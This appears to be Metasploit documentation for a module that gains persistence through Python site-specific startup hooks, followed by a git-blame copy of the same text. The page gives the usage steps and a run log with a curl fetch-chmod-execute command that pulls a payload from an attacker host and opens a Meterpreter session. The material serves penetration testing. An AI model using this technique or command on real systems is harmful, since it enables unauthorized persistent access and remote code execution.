documentation/modules/exploit/multi/persistence/python_site_specific_hook.md

## Vulnerable Application

This module leverages Python's startup mechanism, where some files can be automically processed during the initialization of the Python interpreter. One of those files are startup hooks (site-specific, dist-packages). If these files are present in `site-specific` or `dist-packages` directories, any lines beginning with `import` will be executed automatically. This creates a persistence mechanism, if an attacker has established access to target machine with sufficient permissions.

## Verification Steps
Example steps in this format (is also in the PR):


1. Start msfconsole
1. Get a session 
1. Do: `use multi/persistence/python_site_specific_hook`
1. Do: `set session #`
1. Do: `run`

## Options

### PYTHON_HOOK_PATH

If user has session to target machine with non-typical Python paths, they can set their own path to Python hooks.

### EXECUTION_TARGET

Python has multiple locations, where it can store startup hooks. This option specifies if the target location should be SYSTEM one - i.e. should affect all users - or USER one, which targets current user.

## Scenarios

### Linux pop-os 6.17.4-76061704-generic

```
msf exploit(multi/persistence/python_site_specific_hook) > run verbose=true 
[*] Command to run on remote host: curl -so ./xtLDGMnHcvHv http://192.168.3.7:8080/EO6WzfXF6CGyqdBiy1rT5w;chmod +x ./xtLDGMnHcvHv;./xtLDGMnHcvHv&
[*] Exploit running as background job 9.
[*] Exploit completed, but no session was created.

[*] Fetch handler listening on 192.168.3.7:8080
[*] HTTP server started
[*] Adding resource /EO6WzfXF6CGyqdBiy1rT5w
msf exploit(multi/persistence/python_site_specific_hook) > [*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable. Python is present on the system
[*] Detected Python version 3.10
[*] Got path to site-specific hooks /usr/local/lib/python3.10/dist-packages/
[*] Creating directory /usr/local/lib/python3.10/dist-packages/
[*] /usr/local/lib/python3.10/dist-packages/ created
[*] Client 192.168.3.7 requested /EO6WzfXF6CGyqdBiy1rT5w
[*] Sending payload to 192.168.3.7 (curl/7.81.0)
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (3090404 bytes) to 192.168.3.7
[*] Meterpreter session 4 opened (192.168.3.7:4444 -> 192.168.3.7:34170) at 2025-11-19 07:04:54 +0100

msf exploit(multi/persistence/python_site_specific_hook) > sessions 4
[*] Starting interaction with 4...

meterpreter > sysinfo
Computer     : 172.16.187.129
OS           : Pop 22.04 (Linux 6.17.4-76061704-generic)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > getuid
Server username: ms

```

### Windows 10.0.15063
```

```
Enhances payload delivery, adds docs base 2025-11-11 08:39:40 +01:00			`## Vulnerable Application`

Adds docs 2025-11-19 07:17:07 +01:00			This module leverages Python's startup mechanism, where some files can be automically processed during the initialization of the Python interpreter. One of those files are startup hooks (site-specific, dist-packages). If these files are present in `site-specific` or `dist-packages` directories, any lines beginning with `import` will be executed automatically. This creates a persistence mechanism, if an attacker has established access to target machine with sufficient permissions.
Enhances payload delivery, adds docs base 2025-11-11 08:39:40 +01:00
			`## Verification Steps`
			`Example steps in this format (is also in the PR):`

Adds docs 2025-11-19 07:17:07 +01:00
Enhances payload delivery, adds docs base 2025-11-11 08:39:40 +01:00			`1. Start msfconsole`
Adds docs 2025-11-19 07:17:07 +01:00			`1. Get a session`
			1. Do: `use multi/persistence/python_site_specific_hook`
			1. Do: `set session #`
Enhances payload delivery, adds docs base 2025-11-11 08:39:40 +01:00			1. Do: `run`

			`## Options`

Adds docs 2025-11-19 07:17:07 +01:00			`### PYTHON_HOOK_PATH`

			`If user has session to target machine with non-typical Python paths, they can set their own path to Python hooks.`
Enhances payload delivery, adds docs base 2025-11-11 08:39:40 +01:00
Adds docs 2025-11-19 07:17:07 +01:00			`### EXECUTION_TARGET`

			`Python has multiple locations, where it can store startup hooks. This option specifies if the target location should be SYSTEM one - i.e. should affect all users - or USER one, which targets current user.`
Enhances payload delivery, adds docs base 2025-11-11 08:39:40 +01:00
			`## Scenarios`

Adds docs 2025-11-19 07:17:07 +01:00			`### Linux pop-os 6.17.4-76061704-generic`
Enhances payload delivery, adds docs base 2025-11-11 08:39:40 +01:00
			```
Adds docs 2025-11-19 07:17:07 +01:00			`msf exploit(multi/persistence/python_site_specific_hook) > run verbose=true`
			`[*] Command to run on remote host: curl -so ./xtLDGMnHcvHv http://192.168.3.7:8080/EO6WzfXF6CGyqdBiy1rT5w;chmod +x ./xtLDGMnHcvHv;./xtLDGMnHcvHv&`
			`[*] Exploit running as background job 9.`
			`[*] Exploit completed, but no session was created.`
Enhances payload delivery, adds docs base 2025-11-11 08:39:40 +01:00
Adds docs 2025-11-19 07:17:07 +01:00			`[*] Fetch handler listening on 192.168.3.7:8080`
			`[*] HTTP server started`
			`[*] Adding resource /EO6WzfXF6CGyqdBiy1rT5w`
			`msf exploit(multi/persistence/python_site_specific_hook) > [*] Running automatic check ("set AutoCheck false" to disable)`
			`[+] The target is vulnerable. Python is present on the system`
			`[*] Detected Python version 3.10`
			`[*] Got path to site-specific hooks /usr/local/lib/python3.10/dist-packages/`
			`[*] Creating directory /usr/local/lib/python3.10/dist-packages/`
			`[*] /usr/local/lib/python3.10/dist-packages/ created`
			`[*] Client 192.168.3.7 requested /EO6WzfXF6CGyqdBiy1rT5w`
			`[*] Sending payload to 192.168.3.7 (curl/7.81.0)`
			`[*] Transmitting intermediate stager...(126 bytes)`
			`[*] Sending stage (3090404 bytes) to 192.168.3.7`
			`[*] Meterpreter session 4 opened (192.168.3.7:4444 -> 192.168.3.7:34170) at 2025-11-19 07:04:54 +0100`
Enhances payload delivery, adds docs base 2025-11-11 08:39:40 +01:00
Adds docs 2025-11-19 07:17:07 +01:00			`msf exploit(multi/persistence/python_site_specific_hook) > sessions 4`
			`[*] Starting interaction with 4...`
Enhances payload delivery, adds docs base 2025-11-11 08:39:40 +01:00
Adds docs 2025-11-19 07:17:07 +01:00			`meterpreter > sysinfo`
			`Computer : 172.16.187.129`
			`OS : Pop 22.04 (Linux 6.17.4-76061704-generic)`
			`Architecture : x64`
			`BuildTuple : x86_64-linux-musl`
			`Meterpreter : x64/linux`
			`meterpreter > getuid`
			`Server username: ms`

			```

			`### Windows 10.0.15063`
Enhances payload delivery, adds docs base 2025-11-11 08:39:40 +01:00			```
Adds docs 2025-11-19 07:17:07 +01:00
Enhances payload delivery, adds docs base 2025-11-11 08:39:40 +01:00			```